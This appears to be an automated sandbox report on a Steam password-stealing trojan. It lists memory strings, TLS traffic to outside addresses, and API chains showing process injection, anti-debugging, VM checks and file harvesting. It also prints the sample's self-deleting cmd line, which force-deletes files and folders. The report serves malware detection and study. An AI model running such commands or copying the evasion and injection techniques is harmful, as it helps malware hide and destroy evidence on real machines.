          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.dr | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknown | HTTPS traffic detected: 23.50.98.133:443 -> 192.168.2.12:49717 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.12:49721 version: TLS 1.2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00535D70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_0030BD50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_0030A130
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00309B30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00309B58
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: String function: 002F2000 appears 287 times
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/1@3/3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00301400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00300900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\76561199747278259[1].htm
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | ReversingLabs: Detection: 63%
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Virustotal: Detection: 69%
          Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exit
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exit
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: rstrtmgr.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: dbghelp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: winhttp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: wbemcomn.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: sxs.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: windows.fileexplorer.common.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: ntshrui.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: linkinfo.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: edputil.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: appresolver.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: bcp47langs.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: slc.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: sppc.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: pcacli.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Section loaded: sfc_os.dll
          Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00307A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00307A40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_0030CDD5 push ecx; ret 0_2_0030CDE8
          Source: initial sample | Static PE information: section name: UPX0
          Source: initial sample | Static PE information: section name: UPX1

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exit
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exit
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00307A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00307A40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\timeout.exe TID: 6340 | Thread sleep count: 80 > 30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | File Volume queried: C:\ FullSizeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F1110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F9D40 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F99F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00305A70 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00305EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FAAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FC2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FA2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_003056C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00304F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FB390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_003053C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FFDA0 GetSystemInfo,wsprintfA
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | API call chain: ExitProcess graph end node graph_0-16161
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_0030D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F2000 VirtualProtect 00000000,00000004,00000100,?
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exeCode function: 0_2_00307A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00307A40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_003076E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00300420 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,lstrcat,GetCurrentHwProfileA,lstrlen,lstrcat
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_0030ECC8 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_0030D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_0030CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Memory protected: page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe PID: 6924, type: MEMORYSTR
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FED80 memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_00301400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_003012F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe" & rd /s /q "C:\ProgramData\AEGHIJEHJDHI" & exit
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002F1000 cpuid
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_002FFC30
